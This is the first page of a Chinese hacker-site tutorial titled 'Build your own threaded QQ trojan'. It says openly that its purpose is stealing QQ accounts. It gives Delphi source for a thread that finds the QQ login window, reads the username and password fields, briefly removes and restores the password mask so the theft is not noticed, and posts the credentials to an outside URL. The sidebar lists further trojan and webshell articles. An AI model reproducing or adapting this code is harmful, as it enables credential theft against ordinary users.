| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> 编程 >> 其它编程 >> 正文 用户登录 新用户注册
打造自己的线程QQ木马       ★★★ 【字体:
打造自己的线程QQ木马
作者:不详 文章来源:华盟收集 点击数: 更新时间:2008-8-7

  本来我是想写个好点的DLL木马的,可考虑到篇幅有限(其实是水平有限啊^_^),于是写了一个简单一点的,希望大家能从中学到点什么。

  一.判断QQ是否运行

  QQ木马当然是用来盗号的,所以第一步要先判断QQ是否已经运行,。有一种比较简便的方法是通过调用findwindow这个API函数来取得QQ主程序的窗口句柄。如果函数返回值为空,则表示QQ没有运行,如果大余0则表示QQ已经运行。下面是findwindow这个函数的声明:

  FWND FindWindow (LPCTSTR IpClassName, LPCTSTR IpWindowName);

  因为QQ程序的窗口类名是32770,所以通过调用FindWindow(`#32770`,nil)就可以得到QQ主程序的窗口句柄了。这样就可以判断QQ是否运行了。

  二.获取QQ帐号和密码

  在取得QQ程序主窗口的句柄后我们可以再调用另外一个函数FindWindowEx就可以得到QQ登陆帐号和密码的句柄了。然后通sendmessage函数发送一条消息给这个输入框,QQ程序就会返回这个输入框里面的文字信息。这是sendmessage函数的原型:LRESULT SendMessage (HWND hWnd,UINT Msg, WPARAMwParam, LPARAM IParam);但是在调用sendmessage函数取得QQ密码的时候,QQ密码经常回不显示星号而是直接显示用户输入的字符,这样就很容易被人发现,为了不让密码显示出来还应调应函数PostMessage,它和sendmessage的区别就是sendmessage直接把一个消息发送给窗口,等消息处理完后才返回,而PostMessage是把消息发送到消息队列后立即返回。这样通过PstMessage发送一个带*号的字符给QQ密码输入框,QQ密码输入框就和以前一样了,只会显示星号而不显示字符。下面是整个截取QQ登陆帐号和密码的函数:

procedure ThreadProc;
var
p,k:integer;
qqhwnd,qqhwnd2,tempH:hwnd;
username,password:pchar;
usertemp,passtemp:string;
begin
while true do
begin
sleep(100);
p:=k;
getmem(username,255);
getmem(password,255);
QQhwnd:=FindWindow(`#32770`,nil);
qqhwnd2:=FindWindowEx(qqhwnd,0,`Button`,`注册向导`);
if qqhwnd2<>0 then
begin
k:=1;
TempH:=FindWindowEx(qqHwnd,0,`ComboBox`,nil);
SendMessage(TempH,WM_GETTEXT,100,Integer(username));
TempH:=FindWindowEx(QQHwnd,0,`Edit`,nil);
PostMessage(TempH,EM_SETPASSWORDCHAR,ord(#0),0);
Sleep(10);
SendMessage(TempH,WM_GETTEXT,100,Longint(password));
PostMessage(TempH,EM_SETPASSWORDCHAR,wparam(`*`),0);
usertemp:=username;
passtemp:=password;
end
else
begin
QQhwnd:=FindWindowEx(qqhwnd,0,`#32770`,nil);
QQhwnd:=FindWindowEx(qqhwnd,0,`Button`,`使用已有的QQ号码`);
if qqhwnd<>0 then
begin
k:=1;
TempH:=GetNextWindow(QQHwnd,GW_HWNDNEXT);
SendMessage(TempH,WM_GETTEXT,100,Integer(username));
TempH:=GetNextWindow(TempH,GW_HWNDNEXT);
PostMessage(TempH,EM_SETPASSWORDCHAR,ord(#0),0);
Sleep(10);
SendMessage(TempH,WM_GETTEXT,100,Longint(password));
PostMessage(TempH.EM_SETPASSWORDCHAR, wparam(`*`),0);
usertemp:=username;
passtemp:=password;
end
else k:=0;
end;

if (p=1) and (k=0) and (length(usertemp)>4) and (length(usertemp)<10) and (length(passtemp)>3) then
begin
PostURL(http://www.sokuang.com/qq/post.asp`,`username=`+usertemp+`&password=`+passtemp);
end;
freemem(username);
freemem(password);

end;
end;

[1] [2] 下一页

责任编辑:朱倩  联系方式  Email:朱倩
电话:51228163
  • 上一篇编程:

  • 下一篇编程:
    • (只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    姓 名:
    		 * 游客填写  ·注册用户
    主 页:
    评 分:
    		 1分 2分 3分 4分 5分
    评论内容:
    验证码: *
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
    • 最新hack更新
    最新推荐资讯
    相关编程
    天龙八部木马核心代码
    VC++多线远程IPC木马
    代码藏后门的可能性
    打造自己的线程QQ木马
    VC++多线远程IPC木马
    常见木马隐藏启动方式
    超浓缩diy.asp上传小马
    经典一句话asp木马加密
    一句话木马用Upfile.vbs脚本
    VC++多线远程IPC木马
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号